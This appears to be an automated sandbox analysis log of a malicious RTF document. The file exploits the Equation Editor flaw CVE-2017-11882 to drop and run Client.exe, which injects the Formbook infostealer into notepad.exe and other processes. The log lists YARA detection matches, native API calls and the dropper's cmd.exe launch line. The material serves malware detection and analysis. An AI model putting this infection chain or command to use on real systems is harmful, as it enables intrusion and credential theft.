          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F13B0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F3618
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F4AB9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FA060
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F4AC8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_003403E5
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59CB0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59EF0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59AE0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B5A4E8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B56C10
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59920
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C40048
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C40548
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4050C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E163
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E166
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041F9AA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EA20
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040E330
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EC09
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409DD0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041F584
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D8B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E7ED
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1E0C6
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4D005
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B9D06D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3905A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B23040
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1E2E9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC1238
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC63BF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B463DB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1F3CF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B22305
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B6A37B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B27353
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B55485
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B31489
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA443E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5D47D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3C5F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA05E3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2351F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B66540
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B24680
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2E6C1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B6A634
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC2622
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2C7BC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA579A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B557C3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BBF8EE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B9F8C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4286D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2C85C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B229B2
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC098E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B369FE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA5955
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA394B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BD3A83
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BCCBA4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BADBDA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA6BCB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B47B00
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BBFDDD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B50D3B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2CD5B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B6373B appears 217 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B63F92 appears 116 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B8F970 appears 80 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1DF5C appears 111 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1E2A8 appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F24A0 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F2498 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9DC10 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9D1F0 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9CD08 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9F100 NtResumeThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9D700 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4B8D8 NtCreateThreadEx,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4B3F8 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AD40 NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041ADF0 NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AE70 NtClose,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AF20 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AD3A NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AE6A NtClose,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AF1A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B110D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10060 NtQuerySection,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B101D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11148 NtOpenThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FD5C NtEnumerateKey,
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: mozglue.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: winsqlite3.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 77740000 page execute and read and write
          Source: Client.exe.0.drStatic PE information: Section: bdzG4e ZLIB complexity 1.0003269937782806
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfReversingLabs: Detection: 14%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR582D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfStatic file information: File size 2883613 > 1048576
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01185096 push 00000020h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01189ABE push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_011828DB pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_011854E3 push 00000020h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FA050 push eax; retf 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F907A push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F9092 pushfd ; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FAA30 push eax; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FAA50 pushad ; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F8EDD push eax; retn 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F8ED8 push eax; retn 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C43EA9 push 03682C01h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4381A push 800FD82Bh; retf 006Dh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4301A push 800FD82Bh; retf 0075h
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4371A push 800FD82Bh; retf 006Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C632BC push 800FD82Bh; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C642B8 push 800FD82Bh; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C647BD push 800FD82Bh; retf 005Fh
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C63DBB push 800FF02Bh; retf 0069h
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C64FB8 push 800FC303h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C61B75 push 800FC303h; retn 0002h
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04E4585D push 800FD82Bh; retf
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E075 push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040880F push ebx; iretd
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0C2 push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_004140CB push 00000011h; retf
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0CB push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041B11A push edi; retf
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E12C push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040D2D0 pushfd ; retf
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00406AE4 push ebp; ret
          Source: Client.exe.0.drStatic PE information: section name: bdzG4e
          Source: Client.exe.0.drStatic PE information: section name:
          Source: initial sampleStatic PE information: section name: bdzG4e entropy: 7.99949678623572
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
